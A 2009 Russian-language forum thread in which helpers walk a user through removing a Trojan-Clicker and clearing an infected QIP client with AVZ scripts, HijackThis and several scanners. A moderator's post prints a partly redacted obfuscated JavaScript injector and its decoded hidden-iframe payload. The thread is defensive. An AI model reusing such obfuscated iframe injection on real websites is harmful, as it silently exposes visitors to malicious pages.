Решена TrojanClicker и его последствия

Тема в разделе "Лечение компьютерных вирусов", создана пользователем kirey, 19 авг 2009.

  1. kirey
    Оффлайн

    kirey Активный пользователь

    Сообщения:
    23
    Симпатии:
    2
    Проблема такова: Нод32 начал при загрузке браузера Opera выбавать сообщения об угрозе с сайта (ссылка удалена) о TrojanClicker. Причем на этот сайт не заходил уже очень давно. Никаких последствий это не несло поначалу. Сканирование системы самим нодом и CureIt результатов не дало. Примерно через сутки Нод выдал информацию о заражении файла QIP.EXE в автозагрузке и еще одного файла. К сожаленью не запомнил какого. Переустановить qip не удалось. Очень бы хотелось узнать что с системой и как от этого избавится). Заранее спасибо.


    Прошу прощения за тему созданную в другом разделе по ошибке.
     
    Последнее редактирование модератором: 19 авг 2009
  2. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.456
    Симпатии:
    13.954
    Эту тему убрал. Тот раздел для файлов с карантином. :)
    http://safezone.cc/forum/showthread.php?t=3031

    Добавлено через 5 минут 50 секунд
    С сайта грузится Trojan-Clicker.JS.Agent.h (ссылку удалил)
    Там iframe:

    HTML:
    <iframe src="*******" width=103 height=125 style="visibility: hidden"></iframe><script>function v4a83f49dcd229(v4a83f49dcd9f7){  return(parseInt(v4a83f4*******68(v4a83*********0a6 () {var v4a83f49dd1877=2; return v4a83f49dd1877;} var v4a83f49dd0107='';for(v4a83f49dd08d6=0; v4a83f49dd08d6<v4a83f49dcf937.length; v4a83f49dd0*******d0107+=(String.fromCharCode(v4a838********7.substr(v4a83f49dd08d6, v4a83f49dd10a6()))));}return v4a83f49dd0107;} document.write(v4a83f49dcf168('3C69667*********4703A2F2F747261636B696E676C6F61642E636F6D2F652F696E646578372********23333206865696768743D323131207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
    Который означает
    HTML:
    <iframe name='9190' src='http://*******.com/e/index7.php' width=233 height=211 style='display:none'></iframe>
    Добавлено через 13 минут 46 секунд
    AVZ, меню "Файл - Выполнить скрипт" -- Скопировать ниже написанный скрипт-- Нажать кнопку "Запустить".
    Код (Text):
    begin
     SearchRootkit(true, true);
     SetAVZGuardStatus(true);
     SetServiceStart('RemoveAny', 4);
     QuarantineFile('C:\WINDOWS\system32\Drivers\removeany.sys','');
     DeleteFile('C:\WINDOWS\system32\Drivers\removeany.sys');
     DeleteService('RemoveAny');
     BC_ImportALL;
     ExecuteSysClean;
     BC_Activate;
     RebootWindows(true);
    end.
    После выполнения скрипта компьютер перезагрузится.

    Код (Text):
    begin
     CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
    end.

    Полученный архив прикрепите к этой теме согласно правил.

    Пофиксить в HijackThis следующие строчки
    Код (Text):
     R3 - URLSearchHook: (no name) - - (no file)
    Повторите логи.

    Добавлено через 8 минут 51 секунду
    Таки правильно выдал.
    http://habrahabr.ru/blogs/virus/66937/

    Скачайте свежий дистрибутив QIP. И мой Вам совет ознакомтесь с этой темой.
     
    Последнее редактирование модератором: 20 авг 2009
  3. kirey
    Оффлайн

    kirey Активный пользователь

    Сообщения:
    23
    Симпатии:
    2
    Спасибо большое за быстрый совет. К сожаленью выыполнить все получится только вечером. На работе QIP такую же штуку выдал, но все удачно переустановилось.
    И еще один вопрос. Обязательно ли карантинить CLTest.exe? Это прога для настройки (калибровки) монитора. А в автозагрузке чтобы при включении сразу применялись предустановленные настройки.
     
  4. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.456
    Симпатии:
    13.954
    kirey, нет, необязательно.

    Поправил скрипт.
     
  5. kirey
    Оффлайн

    kirey Активный пользователь

    Сообщения:
    23
    Симпатии:
    2
    Тему с карантином создал. Логи повторяю.
     
  6. ТроПа
    Оффлайн

    ТроПа Активный пользователь

    Сообщения:
    399
    Симпатии:
    738
    На данный момент в логах активного заражения не видно.
    Проблемы ещё какие-то наблюдаются?
     
  7. kirey
    Оффлайн

    kirey Активный пользователь

    Сообщения:
    23
    Симпатии:
    2
    Проблема осталась. Нод периодически продолжает выводить сообщение о Trojan-Clicker.iframe GT
     
    Последнее редактирование: 22 авг 2009
  8. ТроПа
    Оффлайн

    ТроПа Активный пользователь

    Сообщения:
    399
    Симпатии:
    738
    Проблема на том же сайте наблюдается или и на других тоже?
     
  9. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.456
    Симпатии:
    13.954
    Скачайте Malwarebytes' Anti-Malware, установите, обновите базы, выберите "Perform Full Scan", нажмите "Scan", после сканирования - Ok - Show Results (показать результаты) - нажмите "Remove Selected" (удалить выделенные). Откройте лог и скопируйте в сообщение.

    Скачайте DDS или с зеркала и сохраните на рабочий стол, отключите антивирус и запустите dds.scr, когда сканирование закончится, запакуйте файлы из файлов DDS.txt и Attach.txt и вложите в сообщение
     
  10. kirey
    Оффлайн

    kirey Активный пользователь

    Сообщения:
    23
    Симпатии:
    2
    ТроПа
    Проблема проявляется при входе в браузер. А сообщение нода о трояне именно с того же сайта.
     
  11. ТроПа
    Оффлайн

    ТроПа Активный пользователь

    Сообщения:
    399
    Симпатии:
    738
    Кеш браузера чистили?
     
  12. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.456
    Симпатии:
    13.954
    Очистите временные файлы через Пуск-Программы-Стандартные-Служебные-Очистка диска или с помощью ATF Cleaner
    - скачайте ATF Cleaner или с зеркала, запустите, поставьте галочку напротив Select All и нажмите Empty Selected.
    - если вы используете Firefox, нажмите Firefox - Select All - Empty Selected
    - нажмите No, если вы хотите оставить ваши сохраненные пароли
    - если вы используете Opera, нажмите Opera - Select All - Empty Selected
    - нажмите No, если вы хотите оставить ваши сохраненные пароли
     
  13. kirey
    Оффлайн

    kirey Активный пользователь

    Сообщения:
    23
    Симпатии:
    2
    Вот подозреваю, что в этом-то вся и проблема. Ни ATF ни Ccleaner ничего очистить не смогли. Папки с кешем в стандартном месте нет. Поиск по компу тоже ничего не дал. При этом в самой опере файлы кеша можно посмотреть. Саму оперу уже переустанавливал полностью.. Наверно нужно еще раз попытаться снести ее.
     
  14. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.456
    Симпатии:
    13.954
    Поищите в папке All Users.
     
  15. kirey
    Оффлайн

    kirey Активный пользователь

    Сообщения:
    23
    Симпатии:
    2
    В All Users тоже ничего подобного нет.
     
  16. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.456
    Симпатии:
    13.954
    kirey, пробуем так
     
  17. kirey
    Оффлайн

    kirey Активный пользователь

    Сообщения:
    23
    Симпатии:
    2
    Так тожет чистил. Не помогает. Завтра переустановю оперу с удалением всех закладок и настроек.
     
  18. kirey
    Оффлайн

    kirey Активный пользователь

    Сообщения:
    23
    Симпатии:
    2
    Даже переустановка оперы ничего не дала. Почисил кеш и кукисы заодно в IE. Результат тот же самый... Всплывает окно нода с сообщением с угрозой с того сайта.
     
  19. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.456
    Симпатии:
    13.954
    Значит пойтем не стандартным путем.

    Проверьте систему при помощи cureit

    Скачайте ComboFix здесь, здесь или здесь и сохраните на рабочий стол.

    1. Внимание! Обязательно закройте все браузеры, временно выключите антивирус, firewall и другое защитное программное обеспечение. Не запускайте других программ во время работы Combofix. Combofix может отключить интернет через некоторое время после запуска, не переподключайте интернет пока Combofix не завершит работу. Если интернет не появился после окончания работы Combofix, перезагрузите компьютер. Во время работы Combofix не нажимайте кнопки мыши, это может стать причиной зависания Combofix.
    2. Запустите combofix.exe, когда процесс завершится, скопируйте текст из C:\ComboFix.txt и вставьте в следующее сообщение или запакуйте файл C:\ComboFix.txt и прикрепите к сообщению.
    Прим: В случае, если ComboFix не запускается, переименуйте combofix.exe в combo-fix.exe

    Подробнее в "ComboFix. Руководство по применению."

    Скачайте Gmer или с зеркала. Запустите программу. После автоматической экспресс-проверки, отметьте галочкой все жесткие диски и нажмите на кнопку Scan. После окончания проверки сохраните его.
     
  20. kirey
    Оффлайн

    kirey Активный пользователь

    Сообщения:
    23
    Симпатии:
    2
    Высылаю логи. Проявления трояна пока вроде не было. Буду надеятся, что изчез)) Спасибо вам)
     

Поделиться этой страницей